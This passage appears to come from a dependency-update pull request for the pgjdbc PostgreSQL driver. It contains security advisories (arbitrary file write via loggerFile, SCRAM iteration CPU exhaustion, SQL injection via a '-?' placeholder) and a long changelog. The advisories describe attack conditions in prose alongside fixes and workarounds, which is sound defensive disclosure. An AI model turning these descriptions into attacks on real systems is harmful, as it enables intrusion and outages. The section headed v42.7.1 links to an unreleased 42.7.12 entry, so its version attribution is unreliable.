Patches LoggerFile implementation has been removed and will be ignored by the driver, fixed in 42.3.3 ##### Workarounds sanitize the inputs to the driver Reported by Allan Lou v3ged0ge@gmail.com #### Severity Moderate #### References - [https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-673j-qm5f-xpv8](https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-673j-qm5f-xpv8) - [https://github.com/pgjdbc/pgjdbc/commit/f6d47034a4ce292e1a659fa00963f6f713117064](https://github.com/pgjdbc/pgjdbc/commit/f6d47034a4ce292e1a659fa00963f6f713117064) - [https://github.com/pgjdbc/pgjdbc](https://github.com/pgjdbc/pgjdbc) This data is provided by [OSV](https://osv.dev/vulnerability/GHSA-673j-qm5f-xpv8) and the [GitHub Advisory Database](https://github.com/github/advisory-database) ([CC-BY 4.0](https://github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Path traversal in org.postgresql:postgresql BIT-postgresql-jdbc-driver-2022-26520 / [CVE-2022-26520](https://nvd.nist.gov/vuln/detail/CVE-2022-26520) / [GHSA-727h-hrw8-jg8q](https://github.com/advisories/GHSA-727h-hrw8-jg8q) <details> <summary>More information</summary> #### Details In pgjdbc before 42.3.3, an attacker (who controls the jdbc URL or properties) can call java.util.logging.FileHandler to write to arbitrary files through the loggerFile and loggerLevel connection properties. An example situation is that an attacker could create an executable JSP file under a Tomcat web root. NOTE: the vendor's position is that there is no pgjdbc vulnerability; instead, it is a vulnerability for any application to use the pgjdbc driver with untrusted connection properties. #### Severity Low #### References - [https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-673j-qm5f-xpv8](https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-673j-qm5f-xpv8) - [https://nvd.nist.gov/vuln/detail/CVE-2022-26520](https://nvd.nist.gov/vuln/detail/CVE-2022-26520) - [https://github.com/pgjdbc/pgjdbc/pull/2454/commits/017b929977b4f85795f9ad2fa5de6e80978b8ccc](https://github.com/pgjdbc/pgjdbc/pull/2454/commits/017b929977b4f85795f9ad2fa5de6e80978b8ccc) - [https://github.com/pgjdbc/pgjdbc](https://github.com/pgjdbc/pgjdbc) - [https://jdbc.postgresql.org/documentation/changelog.html#version_42.3.3](https://jdbc.postgresql.org/documentation/changelog.html#version_42.3.3) - [https://jdbc.postgresql.org/documentation/head/tomcat.html](https://jdbc.postgresql.org/documentation/head/tomcat.html) - [https://www.debian.org/security/2022/dsa-5196](https://www.debian.org/security/2022/dsa-5196) This data is provided by [OSV](https://osv.dev/vulnerability/GHSA-727h-hrw8-jg8q) and the [GitHub Advisory Database](https://github.com/github/advisory-database) ([CC-BY 4.0](https://github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### pgjdbc: Unbounded PBKDF2 iterations in SCRAM authentication allows CPU exhaustion DoS BIT-postgresql-jdbc-driver-2026-42198 / [CVE-2026-42198](https://nvd.nist.gov/vuln/detail/CVE-2026-42198) / [GHSA-98qh-xjc8-98pq](https://github.com/advisories/GHSA-98qh-xjc8-98pq) <details> <summary>More information</summary> #### Details ##### Summary pgjdbc is vulnerable to a client-side denial of service during SCRAM-SHA-256 authentication. ##### Impact A malicious server can instruct the driver to perform SCRAM authentication with a very large iteration count. With a large enough value, the client spends an unbounded amount of CPU time inside PBKDF2 before authentication can fail. A single attempt ties up a CPU core. Repeated or concurrent attempts exhaust client CPU and can wedge connection pools. In affected versions, `loginTimeout` did not fully mitigate this problem. When `loginTimeout` expired, the caller could stop waiting, but the worker thread performing the connection attempt could continue running and burning CPU inside the SCRAM PBKDF2 computation. This issue affects availability. It does **not** provide authentication bypass, privilege escalation, or direct password disclosure. A user is vulnerable when **all** of the following are true: 1. The connection uses **SCRAM-SHA-256** authentication. 2. The client reaches a **malicious, compromised, or attacker-controlled PostgreSQL endpoint**. 3. That endpoint sends a very large SCRAM PBKDF2 iteration count in the `server-first-message`. In practice, that can happen in these situations: - the application lets end users or tenants supply their own database connection details (as in many BI, reporting, analytics, ETL, and low-code platforms), so a user can point the shared client host at a server they control - the application accepts connection strings, hostnames, or JDBC URLs from user input, configuration uploaded by users, or other untrusted sources - the application is configured to connect to a PostgreSQL server that is itself malicious or later becomes compromised - the application connects through an untrusted proxy, relay, tunnel, bastion, or connection-pooling service that can act as the PostgreSQL server - an attacker can redirect the client to a fake PostgreSQL endpoint by manipulating DNS, service discovery, Kubernetes service resolution, `/etc/hosts`, environment variables, or similar indirection - an active network attacker on the path can impersonate the server because the connection does not strongly verify server identity (for example, `sslmode` lower than `verify-full`, or trusting a CA that signs hosts outside the operator's control) The issue is **more damaging** when the application uses connection retries, many parallel connection attempts, or `loginTimeout` and assumes the timeout fully stops the work. ##### Patches The patch introduces a new connection property, `scramMaxIterations`, with a default of 100K. The client now rejects SCRAM server messages that advertise more PBKDF2 iterations than the configured cap before starting the PBKDF2 computation begins. ##### Workarounds Until a patched version of pgjdbc is deployed, the following measures reduce exposure: 1. **Only connect to trusted PostgreSQL servers whose identity is verified.** Connect only to trusted PostgreSQL servers, and verify server identity with TLS using sslmode=verify-full and a trusted CA. TLS without certificate and hostname verification is not sufficient as an active network attacker can still impersonate the server. 2. **Do not rely on `loginTimeout` as a complete mitigation on unpatched versions.** On affected versions, `loginTimeout` can stop the waiting caller while the worker thread continues spending CPU. 3. **Avoid SCRAM on untrusted or interceptable connection paths.** For those paths, use an authentication method that does not let the server choose a SCRAM PBKDF2 iteration count. 4. **Reduce blast radius operationally.** Limit parallel connection attempts, add retry backoff, isolate connection establishment in a separate worker or process when possible, and apply CPU or container limits where appropriate. 5. **On trusted servers you control, keep SCRAM iteration counts at ordinary values.** This does not defend against an attacker-controlled server, but it avoids unnecessary client cost when talking to legitimate servers. #### Severity - CVSS Score: 7.5 / 10 (High) - Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H` #### References - [https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-98qh-xjc8-98pq](https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-98qh-xjc8-98pq) - [https://nvd.nist.gov/vuln/detail/CVE-2026-42198](https://nvd.nist.gov/vuln/detail/CVE-2026-42198) - [https://github.com/pgjdbc/pgjdbc](https://github.com/pgjdbc/pgjdbc) - [https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.11](https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.11) This data is provided by [OSV](https://osv.dev/vulnerability/GHSA-98qh-xjc8-98pq) and the [GitHub Advisory Database](https://github.com/github/advisory-database) ([CC-BY 4.0](https://github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Release Notes <details> <summary>pgjdbc/pgjdbc (org.postgresql:postgresql)</summary> ### [`v42.7.11`](https://github.com/pgjdbc/pgjdbc/blob/HEAD/CHANGELOG.md#42711-2026-04-28) ##### Security - fix: Limit SCRAM PBKDF2 iterations accepted from the server. pgjdbc was vulnerable to a client-side denial of service in SCRAM-SHA-256 authentication, where a malicious or compromised PostgreSQL server could specify an extremely large PBKDF2 iteration count, causing the client to consume unbounded CPU and potentially exhaust connection pools. The fix introduces a new scramMaxIterations connection property (defaulting to 100,000) to cap iteration counts before computation begins. See the [Security Advisory](https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-98qh-xjc8-98pq) for more detail. The following [CVE-2026-42198](https://nvd.nist.gov/vuln/detail/CVE-2026-42198) has been issued. ##### Added - feat: implement require\_auth connection property, aligning with libpq behavior [PR #&#8203;3895](https://github.com/pgjdbc/pgjdbc/pull/3895) ##### Changed - chore: replace Appveyor CI with ikalnytskyi/action-setup-postgres [PR #&#8203;3966](https://github.com/pgjdbc/pgjdbc/pull/3966) - chore: upgrade Gradle to v9 [PR #&#8203;3978](https://github.com/pgjdbc/pgjdbc/pull/3978) ##### Fixed - fix: ensure extended protocol messages end with Sync message [PR #&#8203;3728](https://github.com/pgjdbc/pgjdbc/pull/3728) - fix: enable cursor-based fetching in extended protocol when transaction started via SQL command [PR #&#8203;3996](https://github.com/pgjdbc/pgjdbc/pull/3996) - fix: retry with SSL on IOException when sslMode=ALLOW [PR #&#8203;3973](https://github.com/pgjdbc/pgjdbc/pull/3973) - fix: make sure the driver honours connectTimeout when retrying the connection [PR #&#8203;3968](https://github.com/pgjdbc/pgjdbc/pull/3968) - fix: allow fallback to non-SSL connection when sslMode=prefer and sslResponseTimeout kicks in [PR #&#8203;3968](https://github.com/pgjdbc/pgjdbc/pull/3968) - fix: catch SecurityException from setContextClassLoader on ForkJoinPool workers [PR #&#8203;3962](https://github.com/pgjdbc/pgjdbc/pull/3962) - fix: use compareTo for LogSequenceNumber comparison to handle unsigned values correctly [PR #&#8203;3961](https://github.com/pgjdbc/pgjdbc/pull/3961) - fix: release COPY lock on IOException to prevent connection hang [PR #&#8203;3957](https://github.com/pgjdbc/pgjdbc/pull/3957) - fix: return jsonb as PGObject instead of String [PR #&#8203;3956](https://github.com/pgjdbc/pgjdbc/pull/3956) - fix: align SSL key file permission check with libpq [PR #&#8203;3952](https://github.com/pgjdbc/pgjdbc/pull/3952) - fix: guard connection closed flag with a reentrant lock to protect against concurrent close [PR #&#8203;3905](https://github.com/pgjdbc/pgjdbc/pull/3905) ### [`v42.7.10`](https://github.com/pgjdbc/pgjdbc/blob/HEAD/CHANGELOG.md#42710-2026-02-11) ##### Changed - chore: Migrate to Shadow 9 [PR 3931](https://github.com/pgjdbc/pgjdbc/pull/3931) - style: fix empty line before javadoc for checkstyle compliance [PR #&#8203;3925](https://github.com/pgjdbc/pgjdbc/pull/3925) - style: fix lambda argument indentation for checkstyle compliance [PR #&#8203;3922](https://github.com/pgjdbc/pgjdbc/pull/3922) - test: add autosave=always|never|conservative and cleanupSavepoints=true|false to the randomized CI jobs [PR #&#8203;3917](https://github.com/pgjdbc/pgjdbc/pull/3917) ##### Fixed - fix: non-standard strings failing test for version 19 [PR #&#8203;3934](https://github.com/pgjdbc/pgjdbc/pull/3934) - fix: small issues in ConnectionFactoryImpl [PR #&#8203;3929](https://github.com/pgjdbc/pgjdbc/pull/3929) - fix: process pending responses before fastpath to avoid protocol errors [PR # 3913](https://github.com/pgjdbc/pgjdbc/pull/3913) - doc: use.md, fix typos [PR #&#8203;3911](https://github.com/pgjdbc/pgjdbc/pull/3911) - doc: datasource.md, fix minor formatting issue [PR #&#8203;3912](https://github.com/pgjdbc/pgjdbc/pull/3912) - doc: add the new PGP signing key to the official documentation [PR #&#8203;3912](https://github.com/pgjdbc/pgjdbc/pull/3813) ##### Reverted - Revert "fix: make all Calendar instances proleptic Gregorian ([#&#8203;3837](https://github.com/pgjdbc/pgjdbc/issues/3837)) ([#&#8203;3887](https://github.com/pgjdbc/pgjdbc/issues/3887))" [PR #&#8203;3932](https://github.com/pgjdbc/pgjdbc/pull/3932) ### [`v42.7.9`](https://github.com/pgjdbc/pgjdbc/blob/HEAD/CHANGELOG.md#4279-2026-01-14) ##### Added - feat: query timeout property [PR #&#8203;3705](https://github.com/pgjdbc/pgjdbc/pull/3705) - feat: Add PEMKeyManager to handle PEM based certs and keys [PR #&#8203;3700](https://github.com/pgjdbc/pgjdbc/pull/3700) ##### Changed - perf: optimize PGInterval.getValue() by replacing String.format with StringBuilder - doc: update property quoteReturningIdentifiers default value [PR #&#8203;3847](https://github.com/pgjdbc/pgjdbc/pull/3847) - security: Use a static method forName to load all user supplied classes. Use the Class.forName 3 parameter method and do not initilize it unless it is a subclass of the expected class ##### Fixed - fix: incorrect pg\_stat\_replication.reply\_time calculation [PR #&#8203;3906](https://github.com/pgjdbc/pgjdbc/pull/3906) - fix: close temporary lob descriptors that are used internally in PreparedStatement#setBlob - fix: PGXAConnection.prepare(Xid) should return XA\_RDONLY if the connection is read only [PR #&#8203;3897](https://github.com/pgjdbc/pgjdbc/pull/3897) - fix: make all Calendar instances proleptic Gregorian [PR #&#8203;3837](https://github.com/pgjdbc/pgjdbc/pull/3887) - fix: Simplify concurrency guards on QueryExecutorBase#transaction and QueryExecutorBase#standardConformingStrings [PR #&#8203;3897](https://github.com/pgjdbc/pgjdbc/pull/3849) - fix: avoid memory leaks in Java <= 21 caused by Thread.inheritedAccessControlContext [PR #&#8203;3886](https://github.com/pgjdbc/pgjdbc/pull/3886) - fix: Issue [#&#8203;3784](https://github.com/pgjdbc/pgjdbc/issues/3784) pgjdbc can't decode numeric arrays containing special numbers like NaN [PR #&#8203;3838](https://github.com/pgjdbc/pgjdbc/pull/3838) - fix: use ssl\_is\_used() to check for ssl connection [PR #&#8203;3867](https://github.com/pgjdbc/pgjdbc/pull/3867) - fix: the classloader is nullable [PR #&#8203;3907](https://github.com/pgjdbc/pgjdbc/pull/3907) ### [`v42.7.8`](https://github.com/pgjdbc/pgjdbc/blob/HEAD/CHANGELOG.md#4278-2025-09-18) ##### Added - feat: Add configurable boolean-to-numeric conversion for ResultSet getters [PR #&#8203;3796](https://github.com/pgjdbc/pgjdbc/pull/3796) ##### Changed - perf: remove QUERY\_ONESHOT flag when calling getMetaData [PR #&#8203;3783](https://github.com/pgjdbc/pgjdbc/pull/3783) - perf: use `BufferedInputStream` with `FileInputStream` [PR #&#8203;3750](https://github.com/pgjdbc/pgjdbc/pull/3750) - perf: enable server-prepared statements for DatabaseMetaData ##### Fixed - fix: avoid NullPointerException when cancelling a query if cancel key is not known yet - fix: Change "PST" timezone in TimestampTest to "Pacific Standard Time" [PR #&#8203;3774](https://github.com/pgjdbc/pgjdbc/pull/3774) - fix: traverse the current dimension to get the correct pos in PgArray#calcRemainingDataLength [PR #&#8203;3746](https://github.com/pgjdbc/pgjdbc/pull/3746) - fix: make sure getImportedExportedKeys returns columns in consistent order - fix: Add "SELF\_REFERENCING\_COL\_NAME" field to getTables' ResultSetMetaData to fix NullPointerException [PR #&#8203;3660](https://github.com/pgjdbc/pgjdbc/pull/3660) - fix: unable to open replication connection to servers < 12 - fix: avoid closing statement caused by driver's internal ResultSet#close() - fix: return empty metadata for empty catalog names as it was before - fix: Incorrect class comparison in PGXmlFactoryFactory validation ### [`v42.7.7`](https://github.com/pgjdbc/pgjdbc/blob/HEAD/CHANGELOG.md#4277-2025-06-10) ##### Security - security: **Client Allows Fallback to Insecure Authentication Despite channelBinding=require configuration.** Fix `channel binding required` handling to reject non-SASL authentication Previously, when channel binding was set to "require", the driver would silently ignore this requirement for non-SASL authentication methods. This could lead to a false sense of security when channel binding was explicitly requested but not actually enforced. The fix ensures that when channel binding is set to "require", the driver will reject connections that use non-SASL authentication methods or when SASL authentication has not completed properly. See the [Security Advisory](https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-hq9p-pm7w-8p54) for more detail. Reported by [George MacKerron](https://github.com/jawj) The following [CVE-2025-49146](https://nvd.nist.gov/vuln/detail/CVE-2025-49146) has been issued ##### Added - test: Added ChannelBindingRequiredTest to verify proper behavior of channel binding settings ### [`v42.7.6`](https://github.com/pgjdbc/pgjdbc/blob/HEAD/CHANGELOG.md#4276) ##### Features - fix: Enhanced DatabaseMetadata.getIndexInfo() method, added index comment as REMARKS property [PR #&#8203;3513](https://github.com/pgjdbc/pgjdbc/pull/3513) ##### Performance Improvements - performance: Improve ResultSetMetadata.fetchFieldMetaData by using IN row values instead of UNION ALL for improved query performance (later reverted) [PR #&#8203;3510](https://github.com/pgjdbc/pgjdbc/pull/3510) - feat:Use a single simple query for all startup parameters, so groupStartupParameters is no longer needed [PR #&#8203;3613](https://github.com/pgjdbc/pgjdbc/pull/3613) - ### [`v42.7.5`](https://github.com/pgjdbc/pgjdbc/blob/HEAD/CHANGELOG.md#4275-2025-01-14-080000--0400) ##### Added - ci: Test with Java 23 [PR #&#8203;3381](https://github.com/pgjdbc/pgjdbc/pull/3381) ##### Fixed - regression: revert change in [`fc60537`](https://github.com/pgjdbc/pgjdbc/commit/fc60537) [PR #&#8203;3476](https://github.com/pgjdbc/pgjdbc/pull/3476) - fix: PgDatabaseMetaData implementation of catalog as param and return value [PR #&#8203;3390](https://github.com/pgjdbc/pgjdbc/pull/3390) - fix: Support default GSS credentials in the Java Postgres client [PR #&#8203;3451](https://github.com/pgjdbc/pgjdbc/pull/3451) - fix: return only the transactions accessible by the current\_user in XAResource.recover [PR #&#8203;3450](https://github.com/pgjdbc/pgjdbc/pull/3450) - feat: don't force send extra\_float\_digits for PostgreSQL >= 12 fix [Issue #&#8203;3432](https://github.com/pgjdbc/pgjdbc/issues/3432) [PR #&#8203;3446](https://github.com/pgjdbc/pgjdbc/pull/3446) - fix: exclude "include columns" from the list of primary keys [PR #&#8203;3434](https://github.com/pgjdbc/pgjdbc/pull/3434) - perf: Enhance the meta query performance by specifying the oid. [PR #&#8203;3427](https://github.com/pgjdbc/pgjdbc/pull/3427) - feat: support getObject(int, byte\[].class) for bytea [PR #&#8203;3274](https://github.com/pgjdbc/pgjdbc/pull/3274) - docs: document infinity and some minor edits [PR #&#8203;3407](https://github.com/pgjdbc/pgjdbc/pull/3407) - fix: Added way to check for major server version, fixed check for RULE [PR #&#8203;3402](https://github.com/pgjdbc/pgjdbc/pull/3402) - docs: fixed remaining paragraphs [PR #&#8203;3398](https://github.com/pgjdbc/pgjdbc/pull/3398) - docs: fixed paragraphs in javadoc comments [PR #&#8203;3397](https://github.com/pgjdbc/pgjdbc/pull/3397) - fix: Reuse buffers and reduce allocations in GSSInputStream addresses [Issue #&#8203;3251](https://github.com/pgjdbc/pgjdbc/issues/3251) [PR #&#8203;3255](https://github.com/pgjdbc/pgjdbc/pull/3255) - chore: Update Gradle to 8.10.2 [PR #&#8203;3388](https://github.com/pgjdbc/pgjdbc/pull/3388) - fix: getSchemas() [PR #&#8203;3386](https://github.com/pgjdbc/pgjdbc/pull/3386) - fix: Update rpm postgresql-jdbc.spec.tpl with scram-client [PR #&#8203;3324](https://github.com/pgjdbc/pgjdbc/pull/3324) - fix: Clearing thisRow and rowBuffer on close() of ResultSet [Issue #&#8203;3383](https://github.com/pgjdbc/pgjdbc/issues/3383) [PR #&#8203;3384](https://github.com/pgjdbc/pgjdbc/pull/3384) - fix: Package was renamed to maven-bundle-plugin [PR #&#8203;3382](https://github.com/pgjdbc/pgjdbc/pull/3382) - fix: As of version 18 the RULE privilege has been removed [PR #&#8203;3378](https://github.com/pgjdbc/pgjdbc/pull/3378) - fix: use buffered inputstream to create GSSInputStream [PR #&#8203;3373](https://github.com/pgjdbc/pgjdbc/pull/3373) - test: get rid of 8.4, 9.0 pg versions and use >= jdk version 17 [PR #&#8203;3372](https://github.com/pgjdbc/pgjdbc/pull/3372) - Changed docker-compose version and renamed script file in instructions to match the real file name [PR #&#8203;3363](https://github.com/pgjdbc/pgjdbc/pull/3363) - test:Do not assume "test" database in DatabaseMetaDataTransactionIsolationTest [PR #&#8203;3364](https://github.com/pgjdbc/pgjdbc/pull/3364) - try to categorize dependencies [PR #&#8203;3362](https://github.com/pgjdbc/pgjdbc/pull/3362) ### [`v42.7.4`](https://github.com/pgjdbc/pgjdbc/blob/HEAD/CHANGELOG.md#4274-2024-08-22-080000--0400) ##### Added - chore: SCRAM dependency to 3.1 and support channel binding [PR #&#8203;3188](https://github.com/pgjdbc/pgjdbc/pull/3188) - chore: Add PostgreSQL 15, 16, and 17beta1 to CI tests [PR #&#8203;3299](https://github.com/pgjdbc/pgjdbc/pull/3299) - test: Update to 17beta3 [PR #&#8203;3308](https://github.com/pgjdbc/pgjdbc/pull/3308) - chore: Implement direct SSL ALPN connections [PR #&#8203;3252](https://github.com/pgjdbc/pgjdbc/pull/3252) - translation: Add Korean translation file [PR #&#8203;3276](https://github.com/pgjdbc/pgjdbc/pull/3276) ##### Fixed - fix: PgInterval ignores case for represented interval string [PR #&#8203;3344](https://github.com/pgjdbc/pgjdbc/pull/3344) - perf: Avoid extra copies when receiving int4 and int2 in PGStream [PR #&#8203;3295](https://github.com/pgjdbc/pgjdbc/pull/3295) - fix: Add support for Infinity::numeric values in ResultSet.getObject [PR #&#8203;3304](https://github.com/pgjdbc/pgjdbc/pull/3304) - fix: Ensure order of results for getDouble [PR #&#8203;3301](https://github.com/pgjdbc/pgjdbc/pull/3301) - perf: Replace BufferedOutputStream with unsynchronized PgBufferedOutputStream, allow configuring different Java and SO\_SNDBUF buffer sizes [PR #&#8203;3248](https://github.com/pgjdbc/pgjdbc/pull/3248) - fix: Fix SSL tests [PR #&#8203;3260](https://github.com/pgjdbc/pgjdbc/pull/3260) - fix: Support bytea in preferQueryMode=simple [PR #&#8203;3243](https://github.com/pgjdbc/pgjdbc/pull/3243) - fix: Fix [#&#8203;3234](https://github.com/pgjdbc/pgjdbc/issues/3234) - Return -1 as update count for stored procedure calls [PR #&#8203;3235](https://github.com/pgjdbc/pgjdbc/pull/3235) - fix: Fix [#&#8203;3224](https://github.com/pgjdbc/pgjdbc/issues/3224) - conversion for TIME '24:00' to LocalTime breaks in binary-mode [PR #&#8203;3225](https://github.com/pgjdbc/pgjdbc/pull/3225) - perf: Speed up getDate by parsing bytes instead of String [PR #&#8203;3141](https://github.com/pgjdbc/pgjdbc/pull/3141) - fix: support PreparedStatement.setBlob(1, Blob) and PreparedStatement.setClob(1, Clob) for lobs that return -1 for length [PR #&#8203;3136](https://github.com/pgjdbc/pgjdbc/pull/3136) - fix: Validates resultset Params in PGStatement constructor. uses assertThro… [PR #&#8203;3171](https://github.com/pgjdbc/pgjdbc/pull/3171) - fix: Validates resultset parameters [PR #&#8203;3167](https://github.com/pgjdbc/pgjdbc/pull/3167) - docs: Replace greater to with greater than [PR #&#8203;3315](https://github.com/pgjdbc/pgjdbc/pull/3315) - docs: Clarify binaryTransfer and prepareThreshold [PR #&#8203;3338](https://github.com/pgjdbc/pgjdbc/pull/3338) - docs: use.md, typo [PR #&#8203;3314](https://github.com/pgjdbc/pgjdbc/pull/3314) - test: Use docker v2 which changes docker-compose to docker compose [#&#8203;3339](https://github.com/pgjdbc/pgjdbc/pull/3339) - refactor: Merge PgPreparedStatement#setBinaryStream int and long methods [PR #&#8203;3165](https://github.com/pgjdbc/pgjdbc/pull/3165) - test: Test both binaryMode=true,false when creating connections in DatabaseMetaDataTest [PR #&#8203;3231](https://github.com/pgjdbc/pgjdbc/pull/3231) - docs: Fixed typos in all source code and documentations [PR #&#8203;3242](https://github.com/pgjdbc/pgjdbc/pull/3242) - chore: Remove self-hosted runner [PR #&#8203;3227](https://github.com/pgjdbc/pgjdbc/pull/3227) - docs: Add cancelSignalTimeout in README [PR #&#8203;3190](https://github.com/pgjdbc/pgjdbc/pull/3190) - docs: Document READ\_ONLY\_MODE in README [PR #&#8203;3175](https://github.com/pgjdbc/pgjdbc/pull/3175) - test: Test for +/- infinity double values [PR #&#8203;3294](https://github.com/pgjdbc/pgjdbc/pull/3294) - test: Switch localhost and auth-test around for test-gss [PR #&#8203;3343](https://github.com/pgjdbc/pgjdbc/pull/3343) - fix: remove preDescribe from internalExecuteBatch [PR #&#8203;2883](https://github.com/pgjdbc/pgjdbc/pull/2883) - deps: Update dependency om.ongres.scram:scram-client to 3.2 ##### Deprecated - test: Deprecate all PostgreSQL versions older than 9.1 [PR #&#8203;3335](https://github.com/pgjdbc/pgjdbc/pull/3335) ### [`v42.7.3`](https://github.com/pgjdbc/pgjdbc/blob/HEAD/CHANGELOG.md#4273-2024-04-14-145100--0400) ##### Changed - chore: gradle config enforces 17+ [PR #&#8203;3147](https://github.com/pgjdbc/pgjdbc/pull/3147) ##### Fixed - fix: boolean types not handled in SimpleQuery mode [PR #&#8203;3146](https://github.com/pgjdbc/pgjdbc/pull/3146) - make sure we handle boolean types in simple query mode - support uuid as well - handle all well known types in text mode and change `else if` to `switch` - fix: released new versions of 42.2.29, 42.3.10, 42.4.5, 42.5.6, 42.6.2 to deal with `NoSuchMethodError on ByteBuffer#position` when running on Java 8 ### [`v42.7.2`](https://github.com/pgjdbc/pgjdbc/blob/HEAD/CHANGELOG.md#4272-2024-02-21-082300--0500) ##### Security - security: SQL Injection via line comment generation, it is possible in `SimpleQuery` mode to generate a line comment by having a placeholder for a numeric with a `-` such as `-?`. There must be second placeholder for a string immediately after. Setting the parameter to a -ve value creates a line comment. This has been fixed in this version fixes [CVE-2024-1597](https://www.cve.org/CVERecord?id=CVE-2024-1597). Reported by [Paul Gerste](https://github.com/paul-gerste-sonarsource). See the [security advisory](https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-24rp-q3w6-vc56) for more details. This has been fixed in versions 42.7.2, 42.6.1 42.5.5, 42.4.4, 42.3.9, 42.2.28.jre7. See the security advisory for work arounds. ##### Changed - fix: Use simple query for isValid. Using Extended query sends two messages checkConnectionQuery was never ever set or used, removed [PR #&#8203;3101](https://github.com/pgjdbc/pgjdbc/pull/3101) - perf: Avoid autoboxing bind indexes by [@&#8203;bokken](https://github.com/bokken) in [PR #&#8203;1244](https://github.com/pgjdbc/pgjdbc/pull/1244) - refactor: Document that encodePassword will zero out the password array, and remove driver's default encodePassword by [@&#8203;vlsi](https://github.com/vlsi) in [PR #&#8203;3084](https://github.com/pgjdbc/pgjdbc/pull/3084) ##### Added - feat: Add PasswordUtil for encrypting passwords client side [PR #&#8203;3082](https://github.com/pgjdbc/pgjdbc/pull/3082) ### [`v42.7.1`](https://github.com/pgjdbc/pgjdbc/blob/HEAD/CHANGELOG.md#42712-2026-xx-xx) ##### Security ##### Added - feat: `reWriteBatchedInserts` now merges up to 32768 rows into one multi-values `INSERT` (bounded by the 65535 bind-parameter limit on the extended protocol) instead of capping at 128, which speeds up batches of few-column rows. The new `reWriteBatchedInsertsSize` connection property lowers that cap when set; the default of `0` uses that maximum. - feat: invalidate the prepared-statement cache after CREATE/DROP/ALTER so callers no longer trip on "cached plan must not change result type" without opting into `autosave=ALWAYS`. Controlled by the new `flushCacheOnDdl` connection property (default `true`); set to `false` for the prior behaviour. - feat: add `connectExecutor` connection property to customize the `Executor` used to run the worker task that performs the connection attempt when `loginTimeout` is in effect. The value is the fully qualified name of a class implementing `java.util.concurrent.Executor`. With a null value, the default, the driver retains the prior behavior of running the connection attempt on a daemon thread named `"PostgreSQL JDBC driver connection thread"`. The executor must run the task on a thread other than the caller's. Running the attempt on a named thread lets applications that monitor driver-created threads identify it. - feat: add `connectThreadFactory` connection property to customize the `ThreadFactory` used to spawn the worker thread that runs the connection attempt when `loginTimeout` is in effect. The value is the fully qualified name of a class implementing `java.util.concurrent.ThreadFactory`. With a null value, the default, the driver retains the prior behavior of using a daemon thread named `"PostgreSQL JDBC driver connection thread"`. Useful for testing timeout behaviour or for applications that want detailed control of all driver-created threads. - feat: add `classLoaderStrategy` connection property to control which classloaders the driver searches when loading a class named by a connection property, for example `socketFactory`. The default `driver-first` now falls back to the thread context classloader when the driver's classloader cannot resolve the class, which fixes class loading in non-flat class paths such as Quarkus and OSGi. Set `driver` to keep the previous driver-classloader-only behaviour, or `context-first` to prefer the thread context classloader [Issue #&#8203;2112](https://github.com/pgjdbc/pgjdbc/issues/2112) ##### Changed - refactor: the worker that runs the connection attempt under `loginTimeout` is now a `FutureTask` (`ConnectTask`) instead of the hand-rolled `ConnectThread`. When the caller hits the timeout, the task is now cancelled with `cancel(true)`, which interrupts the worker thread rather than letting it run to completion. This makes the connection attempt interruptible, so `loginTimeout` can stop a slow connection attempt instead of leaking a thread. As before, a connection that the worker still manages to establish after the caller gives up is closed by the worker so that it does not leak. There are no public API changes and this should only lead to faster background resource cleanup for connections that time out. - chore: `PGXAConnection.ConnectionHandler` now rejects `setAutoCommit(false)` and `setSavepoint(...)` during an active XA branch, in addition to the long-rejected `setAutoCommit(true)` / `commit()` / `rollback()`. The `setSavepoint` rejection was already meant to be in place but the guard misspelled the method name as `setSavePoint`, so savepoints silently went through. Both changes bring the proxy in line with JTA 1.2 §3.4. - chore: `commitPrepared` / `rollback`-of-prepared now return `XAER_RMFAIL` instead of `XAER_RMERR` when the underlying connection is left in a non-idle `TransactionState`. Transaction managers (Geronimo, Narayana, Atomikos) treat `XAER_RMFAIL` as retryable on a fresh `XAResource`; the prepared transaction is no longer abandoned. ##### Fixed - fix: the published GitHub release now ships the released `postgresql-<version>.jar` and its detached PGP signature, taken from the same signed build that is uploaded to Maven Central, instead of a leftover SNAPSHOT jar [Issue #&#8203;3812](https://github.com/pgjdbc/pgjdbc/issues/3812) [PR #&#8203;3814](https://github.com/pgjdbc/pgjdbc/pull/3814) - fix: simplify the `Statement#cancel` state machine by dropping the redundant `CANCELLED` state. `killTimerTask` now waits for the state to return to `IDLE` directly, which removes a spin-forever case when more than one thread observes the cancel completing [PR #&#8203;1827](https://github.com/pgjdbc/pgjdbc/pull/1827). - perf: defer simple-query flushes until the driver reads the response, allowing `BEGIN` and the following query to share a network flush [Issue #&#8203;3894](https://github.com/pgjdbc/pgjdbc/issues/3894) - fix: `reWriteBatchedInserts` no longer throws `IllegalArgumentException` when batching a parameterless `INSERT` (for example `INSERT INTO t VALUES (1, 2)`) of 256 rows or more. - fix: a comment before `CALL` in a `CallableStatement` no longer hides the native call, so OUT parameter registration works for `/* comment */ call proc(?, ?)` and similar. `Parser.modifyJdbcCall` now skips leading whitespace and SQL comments (both `--` and `/* */`) before the call, tolerates a trailing comment after a `{ ... }` escape, and no longer adds a spurious comma when moving an OUT parameter into a call whose arguments are only a comment [Issue #&#8203;2538](https://github.com/pgjdbc/pgjdbc/issues/2538) - fix: `PreparedStatement.toString()` no longer throws for a `bytea` value supplied as text via `PGobject`. Hex-format values (`\x...`) are validated and rendered as a `bytea` literal, and escape-format values are quoted and cast like any other literal [Issue #&#8203;3757](https://github.com/pgjdbc/pgjdbc/issues/3757) - fix: the driver no longer nulls the `contextClassLoader` of shared `ForkJoinPool.commonPool()` worker threads, which previously left unrelated tasks on those threads running with a `null` classloader [Issue #&#8203;4155](https://github.com/pgjdbc/pgjdbc/issues/4155) - fix: getCharacterStream wraps String in StringReader 